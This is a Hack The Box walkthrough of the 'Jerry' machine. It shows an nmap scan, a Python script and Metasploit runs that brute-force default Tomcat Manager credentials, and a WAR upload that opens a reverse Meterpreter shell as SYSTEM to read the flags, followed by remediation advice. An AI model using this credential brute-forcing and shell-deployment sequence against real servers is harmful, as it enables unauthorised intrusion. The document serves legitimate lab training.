[HTB] Jerry

Today we are going to hack the HTB machine called Jerry. It is rated Easy.

Enumeration
sml@m0nikE:~/ctf/htb/machines/jerry$ sudo nmap -A -p- -sS 10.10.10.95 
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-05 21:04 CET
Nmap scan report for 10.10.10.95
Host is up (0.041s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
1   41.26 ms 10.10.14.1
2   43.46 ms 10.10.10.95

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.82 seconds
The only open port is 8080, serving Apache Tomcat 7.0.88 (Apache-Coyote/1.1 is the banner of Tomcat's HTTP connector, not the Tomcat version). Tomcat ships with a Manager web application at /manager/html protected by HTTP Basic authentication, so the first thing to test is default credentials. We use Metasploit's auxiliary/scanner/http/tomcat_mgr_login module with the wordlists it ships by default (tomcat_mgr_default_users.txt, tomcat_mgr_default_pass.txt and tomcat_mgr_default_userpass.txt).
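What the module does under the hood is a loop of Basic-auth requests against /manager/html, telling 200, 401 and 403 apart. The script below is an added example written for this page, not code from the original post or from Metasploit. The credential lists are constructed from the pairs visible in the module output (the real Metasploit wordlists are longer), and the fake manager at the bottom is a constructed stand-in for 10.10.10.95:8080 so the script runs offline; point bruteforce() at the real base URL on the box.

```python
"""Default-credential check against a Tomcat Manager (HTTP Basic auth)."""
import base64
import itertools
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed from the pairs visible in the tomcat_mgr_login output; the
# module's USER_FILE / PASS_FILE / USERPASS_FILE are longer than this.
USERS = ["admin", "manager", "role1", "root", "tomcat", "both"]
PASSWORDS = ["admin", "manager", "role1", "root", "tomcat", "s3cret", "vagrant"]
USERPASS = [("j2deployer", "j2deployer"), ("ovwebusr", "OvW*busr1"),
            ("cxsdk", "kdsxc"), ("root", "owaspbwa"), ("ADMIN", "ADMIN"),
            ("xampp", "xampp"), ("QCC", "QLogic66"), ("admin", "vagrant")]


def candidates():
    """USER_FILE x PASS_FILE first, then the USERPASS_FILE pairs, no repeats."""
    seen = set()
    for pair in itertools.chain(itertools.product(USERS, PASSWORDS), USERPASS):
        if pair not in seen:
            seen.add(pair)
            yield pair


def try_login(base_url, user, password, path="/manager/html", timeout=5):
    """One Basic-auth request. 200 -> 'ok'; 403 -> 'forbidden' (the password
    is right but the user has no manager role); anything else -> 'bad'."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(base_url + path,
                                 headers={"Authorization": "Basic " + token})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return "ok" if resp.status == 200 else "bad"
    except urllib.error.HTTPError as err:
        return "forbidden" if err.code == 403 else "bad"


def bruteforce(base_url, stop_on_success=True):
    """Return [(user, password, result), ...] for every non-failing attempt.
    Metasploit's STOP_ON_SUCCESS defaults to false; here it defaults to true."""
    hits = []
    for user, password in candidates():
        result = try_login(base_url, user, password)
        if result != "bad":
            hits.append((user, password, result))
            if stop_on_success and result == "ok":
                break
    return hits


class FakeManager(BaseHTTPRequestHandler):
    """Constructed stand-in for /manager/html: 401 plus a Basic challenge
    unless the request carries tomcat:s3cret, the pair that worked on Jerry."""
    VALID = "Basic " + base64.b64encode(b"tomcat:s3cret").decode()

    def do_GET(self):
        if self.headers.get("Authorization") == self.VALID:
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(b"<html><head><title>/manager</title></head></html>")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate",
                             'Basic realm="Tomcat Manager Application"')
            self.end_headers()

    def log_message(self, *args):  # silence per-request logging
        pass


def start_fake_manager():
    """Serve FakeManager on a random loopback port; returns (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), FakeManager)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


if __name__ == "__main__":
    server, url = start_fake_manager()  # use http://10.10.10.95:8080 on the box
    print(bruteforce(url))
    server.shutdown()
```

The 403 branch is the one worth keeping: Tomcat answers 403 when the password is correct but the user lacks manager-gui/manager-script, so a "forbidden" hit is a valid credential even though the Manager itself is closed to it.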

Bruteforce Tomcat
msf5 > use auxiliary/scanner/http/tomcat_mgr_login
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                 Required  Description
   ----              ---------------                                                                 --------  -----------
   BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
   PASSWORD                                                                                          no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             8080                                                                            yes       The target port (TCP)
   SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                               yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                          no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                           no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                            yes       Whether to print output for all attempts
   VHOST                                                                                             no        HTTP server virtual host

msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.10.10.95
rhosts => 10.10.10.95
msf5 auxiliary(scanner/http/tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:tomcat (Incorrect)
[+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret
[-] 10.10.10.95:8080 - LOGIN FAILED: both:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We get a valid login: tomcat:s3cret. Two things in the output are worth noting: STOP_ON_SUCCESS is false by default, so the module keeps trying the remaining pairs after the hit, and a 403 instead of a 401 would have meant a correct password for a user without a manager role. An account that can reach the Manager can deploy arbitrary WAR files, which is exactly what exploit/multi/http/tomcat_mgr_upload abuses, so let's use it to try for a shell.

Exploitation
msf5 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload
msf5 exploit(multi/http/tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf5 exploit(multi/http/tomcat_mgr_upload) > set rhosts 10.10.10.95
rhosts => 10.10.10.95
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword s3cret
httppassword => s3cret
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
httpusername => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
rport => 8080
msf5 exploit(multi/http/tomcat_mgr_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.29:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying Si6Mp3gsdJ...
[*] Executing Si6Mp3gsdJ...
[*] Undeploying Si6Mp3gsdJ ...
[*] Sending stage (53906 bytes) to 10.10.10.95
[*] Meterpreter session 1 opened (10.10.14.29:4444 -> 10.10.10.95:49192) at 2019-12-05 21:07:31 +0100

meterpreter > 
meterpreter > getuid
Server username: JERRY$
Good, we have a shell. The server username JERRY$ is the computer account, which is how the Java Meterpreter reports a process running as LocalSystem; let's confirm the privileges with whoami and then collect the flags.

user.txt and root.txt
meterpreter > shell
Process 2 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>cd ..
cd ..

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\

06/19/2018  03:07 AM               apache-tomcat-7.0.88
08/22/2013  05:52 PM               PerfLogs
06/19/2018  05:42 PM               Program Files
06/19/2018  05:42 PM               Program Files (x86)
06/18/2018  10:31 PM               Users
06/19/2018  05:54 PM               Windows
               0 File(s)              0 bytes
               6 Dir(s)  27,631,341,568 bytes free

C:\>cd users
cd users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\Users

06/18/2018  10:31 PM               .
06/18/2018  10:31 PM               ..
06/18/2018  10:31 PM               Administrator
08/22/2013  05:39 PM               Public
               0 File(s)              0 bytes
               4 Dir(s)  27,631,341,568 bytes free

C:\Users>cd administrator
cd administrator

C:\Users\Administrator>cd desktop
cd desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\Users\Administrator\Desktop

06/19/2018  06:09 AM               .
06/19/2018  06:09 AM               ..
06/19/2018  06:09 AM               flags
               0 File(s)              0 bytes
               3 Dir(s)  27,631,341,568 bytes free

C:\Users\Administrator\Desktop>cd flags
cd flags

C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM               .
06/19/2018  06:09 AM               ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,631,271,936 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
C:\Users\Administrator\Desktop\flags>

End
And with that we have both the user flag and the root flag, with no privilege escalation needed: the Tomcat service was running as SYSTEM and its Manager application accepted a default credential pair. The remediation follows directly: remove or change the default users in tomcat-users.xml, keep /manager off untrusted networks, and run Tomcat under a dedicated low-privilege service account.